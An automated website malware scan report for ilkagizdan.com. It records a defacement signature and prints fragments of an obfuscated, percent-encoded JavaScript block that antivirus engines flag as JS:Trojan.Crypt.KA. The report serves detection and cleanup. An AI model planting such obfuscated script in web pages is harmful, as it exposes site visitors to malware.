New scan:

Malware Scanner report for ilkagizdan.com

Malicious/Suspicious/Total urls checked
1/0/4
1 page has malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
Found
Probably the website is defaced. The following signature was found:

//Hacked By ./AnonKFA  (4 websites defaced)

See details below

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://ilkagizdan.com/
200 OK
Content-Length: 54521
Content-Type: text/html
suspicious
Malicious code - confirmed by antiviruses (see below)


var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%
... 3004 bytes are skipped ...
8,40,103,41,45,101,118,97,108,40,107,101,121,46,99,104,97,114,67,111,100,101,65,116,40,99,50,41,41,41,59,105,102,40,99,50,32,61,61,32,107,101,121,46,108,101,110,103,116,104,45,49,41,32,99,50,61,48,59,101,108,115,101,32,99,50,43,43,59,103,61,39,39,59,98,114,101,97,107,59,125,106,43,43,59,125,106,61,48,59,105,43,43,59,125,114,101,116,117,114,110,32,104,59,125,125,60,47,115,99,114,105,112,116,62);dF(str4);document.write(giaima2(str2));document.write(giaima(str1,giaima2(str),'javascriptbank.com'));

Antivirus reports:

nProtect
JS:Trojan.Crypt.KA
F-Secure
JS:Trojan.Crypt.KA
Norman
Inor.A
GData
JS:Trojan.Crypt.KA
BitDefender
JS:Trojan.Crypt.KA

Deface/Content modification. The following signature was found: //Hacked By ./AnonKFA

<script type='text/javascript'>
//Hacked By ./AnonKFA
var str3='%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6
...[54049 bytes skipped]...


http://ilkagizdan.com/test404page.js
404 Not Found
Content-Length: 12839
Content-Type: text/html
clean
http://code.jquery.com/jquery-1.9.1.js
200 OK
Content-Length: 268381
Content-Type: application/javascript
clean
http://suspended.hostgator.com/js/simple-expand.min.js
200 OK
Content-Length: 2782
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: ilkagizdan.com

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Wed, 08 Jul 2015 01:37:04 GMT
Pragma: no-cache
Server: nginx/1.8.0
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: df3fcbc8233071350c98f10fcfb2906f=9eab0780ae9110423afb217faebd7078; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: ilkagizdan.com
Referer: http://www.google.com/search?q=ilkagizdan.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=ilkagizdan.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ilkagizdan.com/

Result: ilkagizdan.com is not infected or malware details are not published yet.